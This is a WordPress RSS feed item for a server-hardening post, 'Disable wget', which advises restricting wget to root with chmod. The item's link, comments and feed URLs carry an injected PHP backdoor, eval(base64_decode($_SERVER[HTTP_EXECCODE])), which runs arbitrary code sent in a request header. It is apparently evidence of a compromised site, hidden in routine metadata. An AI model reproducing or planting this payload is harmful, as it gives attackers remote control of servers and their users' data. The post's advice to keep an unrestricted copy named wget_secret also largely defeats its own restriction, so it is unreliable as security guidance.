<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cPanelConfig - cPanel server configuration guide &#187; permissions</title>
	<atom:link href="http://www.cpanelconfig.com/tag/permissions/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cpanelconfig.com</link>
	<description>The complete guide to setup and manage a cPanel based server</description>
	<lastBuildDate>Fri, 17 Jul 2009 11:15:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Disable wget</title>
		<link>http://www.cpanelconfig.com/2007/11/06/disable-wget/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/11/06/disable-wget/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Tue, 06 Nov 2007 13:41:16 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[General work]]></category>
		<category><![CDATA[Linux commands]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[permissions]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[wget]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/uncategorized/disable-wget/</guid>
		<description><![CDATA[wget is one of the largest threats for your server security. A single abuser that gains access to wget can download and run any script that he wants, totally compromising your server.




It is highly recommended that you allow only root to use wget and you restrict all other users from it.

Login to your server as [...]]]></description>
			<content:encoded><![CDATA[<p>wget is one of the largest threats for your server security. A single abuser that gains access to wget can download and run any script that he wants, totally compromising your server.<br />
<!--adsense--><br />
It is highly recommended that you allow only root to use wget and you restrict all other users from it.</p>
<ol>
<li>Login to your server as root</li>
<li>Run the fallowing command</li>
<blockquote><p>chmod 0700 /usr/bin/wget</p></blockquote>
</ol>
<p>Please note that disabling wget might cause some scripts to stop working. A known problem is that Fantastico will stop updating after this. The solution is pretty easy&#8230;<br />
<strong>Before </strong>you disable wget make sure that you do a copy of it with the initial permissions. You can use any name that you want, the fallowing is just an example:</p>
<blockquote><p>cp /usr/bin/wget /usr/bin/wget_secret</p></blockquote>
<p><!--adsense--><br />
In the Fantastico configuration input the location to wget as:</p>
<blockquote><p>/usr/bin/wget_secret</p></blockquote>
<p>If for some reason you you want to revert the change you simply have to do:</p>
<blockquote><p>chmod 0711 /usr/bin/wget</p></blockquote>
<p>If you have any questions or suggestions please leave a comment.<br />
<!--adsense--></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/11/06/disable-wget/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
